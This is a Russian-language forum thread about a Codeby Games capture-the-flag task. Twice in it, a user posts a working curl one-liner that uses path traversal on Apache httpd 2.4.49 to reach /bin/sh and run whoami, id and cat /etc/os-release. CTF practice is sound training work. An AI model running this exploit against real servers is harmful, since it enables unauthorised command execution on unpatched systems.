Codeby Games Таск Админ Художник?

Jacob Guitarrero

New member
25.11.2023
4
0
BIT
4
Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен
 

Exited3n

Red Team
10.05.2022
760
259
BIT
764
Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен
CVEшку не заюзать ?

Bash:
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
 

Jacob Guitarrero

New member
25.11.2023
4
0
BIT
4
CVEшку не заюзать ?

Bash:
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
 

Exited3n

Red Team
10.05.2022
760
259
BIT
764
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
Честно сказать даже не знаю что посоветовать.
Основы изучи, прям с азов рекомендую начать.
Начни с того что забей в поисковик - curl и почитай про данный инструмент, что делает, как запускается и т.д.
 

GoBL1n

Grey Team
04.08.2016
502
131
BIT
285
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
судя по вопросу, найни с изучения Пингвина

P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))
 

Jacob Guitarrero

New member
25.11.2023
4
0
BIT
4
судя по вопросу, найни с изучения Пингвина

P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))
самое собой изучать его, но этого не достаточно для решения данной задачи
 

Exited3n

Red Team
10.05.2022
760
259
BIT
764
самое собой изучать его, но этого не достаточно для решения данной задачи
Серьезно ? curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'

И так, считаем утилиты - curl, echo, whoami, id, cat
Целых 5 штук! Причем база базой.
 
  • Нравится
Реакции: GoBL1n
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!